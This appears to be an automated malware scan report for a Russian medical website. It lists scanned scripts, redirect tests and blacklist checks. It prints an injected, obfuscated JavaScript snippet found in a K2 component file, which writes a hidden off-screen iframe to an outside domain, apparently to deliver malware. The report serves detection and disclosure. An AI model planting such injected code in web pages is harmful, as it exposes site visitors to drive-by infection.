Scanned pages/files
Request | Server response | Status |
http://kazan-med.ru/ | 200 OK Content-Length: 84008 Content-Type: text/html | clean |
http://kazan-med.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 96965 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/media/system/js/core.js | 200 OK Content-Length: 5387 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 602 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/media/system/js/modal.js | 200 OK Content-Length: 10335 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/media/k2/assets/js/jquery-1.7.1.min.js | 200 OK Content-Length: 94471 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 7423 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterkas( $K2('.k2Scroller').css('width',($K2('.k2Scroller').find('.k2ScrollerElement:first').outerWidth(true))*$K2('.k2Scroller').children('.k2ScrollerElement').length); }); // Equal block heights for the "default" view $K2(window).load(function () { var blocks = $K2('.subCategory, .k2EqualHeights'); var maxHeight = 0; blocks.each(function(){ maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height'))); }); blocks.css('height', maxHeight); }); Antivirus reports:
| ||
http://kazan-med.ru/media/system/js/caption.js | 200 OK Content-Length: 1332 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/templates/shaper_news_iii/js/tools.js | 200 OK Content-Length: 1343 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/plugins/system/helix/js/popbox.js | 200 OK Content-Length: 2197 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/plugins/system/helix/js/dropline.js | 200 OK Content-Length: 2573 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/plugins/system/helix/js/menu.js | 200 OK Content-Length: 5424 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/plugins/system/helix/js/totop.js | 200 OK Content-Length: 1601 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/modules/mod_sptab/assets/js/sptab.js | 200 OK Content-Length: 9741 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/modules/mod_sp_simple_gallery/scripts/slimbox.js | 200 OK Content-Length: 5230 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kazan-med.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 05 Sep 2014 15:22:21 GMT
Server: nginx/1.2.9
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: cff96bf88edb371fe38f4df948452ca2=e99d8c909a782687f3b5612c400f165f; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: kazan-med.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 05 Sep 2014 15:22:21 GMT
Server: nginx/1.2.9
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: cff96bf88edb371fe38f4df948452ca2=e99d8c909a782687f3b5612c400f165f; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: kazan-med.ru
Referer: http://www.google.com/search?q=kazan-med.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kazan-med.ru
Referer: http://www.google.com/search?q=kazan-med.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kazan-med.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kazan-med.ru/
Result: kazan-med.ru is not infected or malware details are not published yet.
Result: kazan-med.ru is not infected or malware details are not published yet.